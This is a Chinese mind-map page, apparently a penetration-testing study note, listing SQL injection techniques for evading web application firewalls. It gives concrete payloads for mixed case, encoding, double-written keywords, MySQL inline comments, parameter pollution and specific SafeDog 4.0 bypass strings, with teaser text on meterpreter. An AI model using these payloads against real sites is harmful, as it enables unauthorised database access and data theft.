导图社区 4.SQL注入
有一些WAF规则设计的问题,只匹配纯大写或纯小写的字符,对字符大小混写直接无视、针对WAF过滤的字符编码,如使用URL编码,unicode编码,十六进制编码,Hex编码等
后渗透之meterpretermeterpreter常用命令1.基本命令2.文件系统命令3.网络命令4.键盘监听5.系统命令6.mimikatz7.网络嗅探8.获取敏感信息9.获取 Hash10.通过 Hash 获..
meterpreter是metasploit中的一个杀手锏,通常在漏洞利用成功后,会返回给攻击者一个攻击通道,其中有很多自动化操作 首先,我们使用metasploit中的另一个后门工具msfvenom生成一个木马...
第一步:终端启动MSFCONSOLE 以管理员身份运行 sudo msfconsole 出现msf提示符了,就登录成功了 第二步:寻找模块 使用search加上自己想找的模块(相当于模糊查询) 使用search命令搜索所有有效的Linux模块 search linux
社区模板帮助中心,点此进入>>
论语孔子简单思维导图
《傅雷家书》思维导图
《童年》读书笔记
《茶馆》思维导图
《朝花夕拾》篇目思维导图
《昆虫记》思维导图
《安徒生童话》思维导图
《鲁滨逊漂流记》读书笔记
《这样读书就够了》读书笔记
妈妈必读:一张0-1岁孩子认知发展的精确时间表
SQL注入之WAF绕过
数据
大小写
有一些WAF规则设计的问题,只匹配纯大写或纯小写的字符,对字符大小混写直接无视
举例:union select ---> UnIon SeLEcT
加密解密
加密一般采用base64
编码解码
针对WAF过滤的字符编码,如使用URL编码,unicode编码,十六进制编码,Hex编码等
举例:union select 1,2,3# ---> union%0aselect 1\u002c2,3%23 %0a:URL编码换行 \u002c:unicode编码,
双写绕过
用来绕过一些敏感字
举例:UNiunionON,SELselectECT,anandd
换行(\n)绕过
举例:select * from admin where username = \N union select 1,user() from admin 换行:也可用URL编码%a0
注释符内联注释
union selecte =/*!union*/ select 注释符里感叹号后面的内容会被mysql执行。
同义词替换
and=&& or=|| =(等于号)=<、> 空格不能使用=%09,%0a,%0b,%0c,%0d,%20,%a0等 注:%0a是换行也可以替代空格
HTTP参数污染
对目标发送多个参数,如果目标没有多参数进行多次过滤,那么WAF对多个参数只会识别其中的一个。 举例:?id=1&id=2&id=3 ?id=1/**&id=-1%20union%20select%201,2,3%23*/
等价函数
特殊符号
反序列化
注释符混用
方式
更改提交方式
变异
其他
Fuzz大法
数据库特性
垃圾数据溢出
安全狗4.0绕过
and or绕过: %20/*//--/*/ V4.0
联合绕过: union/*//--/*/ /*!--+/*%0aselect/*!1,2,3*/ --+
from绕过: /*!06447%23%0afrom*/